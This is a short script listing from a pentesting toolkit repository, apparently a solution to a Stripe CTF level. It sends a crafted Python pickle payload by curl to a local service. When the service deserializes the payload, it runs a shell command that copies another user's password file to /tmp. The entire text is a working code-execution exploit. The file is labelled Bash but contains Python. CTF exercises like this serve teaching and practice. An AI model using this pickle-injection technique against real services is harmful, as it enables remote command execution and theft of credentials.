sec-pentesting-toolkit/CTFs_and_WarGames/STRIPE_1-2-3/1/pickle_attack.sh
2014-11-29 22:16:26 -05:00

6 lines
179 B
Bash

import pickle, os
HOST = 'localhost:9020'
os.execve("/usr/bin/curl", ['', HOST, '-d', \
"bla; job: cos\nsystem\n(S'cat /home/level05/.password \
> /tmp/pass'\ntR."], {})